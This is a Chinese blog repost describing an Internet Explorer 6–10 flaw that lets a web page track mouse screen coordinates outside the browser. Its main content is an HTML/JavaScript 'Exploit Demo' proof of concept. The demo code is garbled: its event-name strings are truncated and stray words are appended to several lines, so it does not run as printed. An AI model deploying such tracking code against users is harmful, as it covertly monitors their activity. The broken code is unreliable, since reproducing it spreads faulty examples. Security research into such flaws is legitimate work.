IE浏览器鼠标坐标跟踪安全风险,通杀全版本---IE的最大特点
刚在Seclist上又看到了IE漏洞。该漏洞的主要影响是可以跟踪鼠标坐标位置,即便当前鼠标位置位于非浏览器窗口。该漏洞最早被spider.io团队发现。javascript
影响版本:IE6-10html
测试:java
在系统目录下新建一个html文件,代码以下:浏览器
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8" />
<title>Exploit Demo</title>
<script type="text/javascript">
window.attachEvent(" function() {
var detector = document.getElementById("detector");
detector.attachEvent(" function (e) {
detector.innerHTML = e.screenX + ", " + e.screenY;
});
setInterval(function () {
detector.fireEvent(" }, 100);
});
</script>
</head>
<body>
<div id="detector"></div>
</body>
</html>
用IE打开新建的html文件
http://perlin.blog.51cto.com/1202304/1123397ide
相关文章
- 1. IE浏览器历史版本图标大全
- 2. IE 浏览器中鼠标点击功能 ScrollIntoView 参数使用
- 3. IE浏览器快捷键大全
- 4. IE浏览器历史版本号大全
- 5. IE安全系列:IE浏览器的技术变迁(下)
- 6. IE安全系列:IE浏览器的技术变迁(上)
- 7. IE 浏览器的 全局捕获
- 8. 浏览器安全标记
- 9. html5 video标签在低版本ie浏览器下怎么办?
- 10. Kiosk模式:IE浏览器中的IE全屏模式
- 更多相关文章...
- • Docker 命令大全 - Docker教程
- • ASP.NET MVC - 安全 - ASP.NET 教程
- • Tomcat学习笔记(史上最全tomcat学习笔记)
- • JDK13 GA发布:5大特性解读
相关标签/搜索
每日一句
-
每一个你不满意的现在,都有一个你没有努力的曾经。
欢迎关注本站公众号,获取更多信息
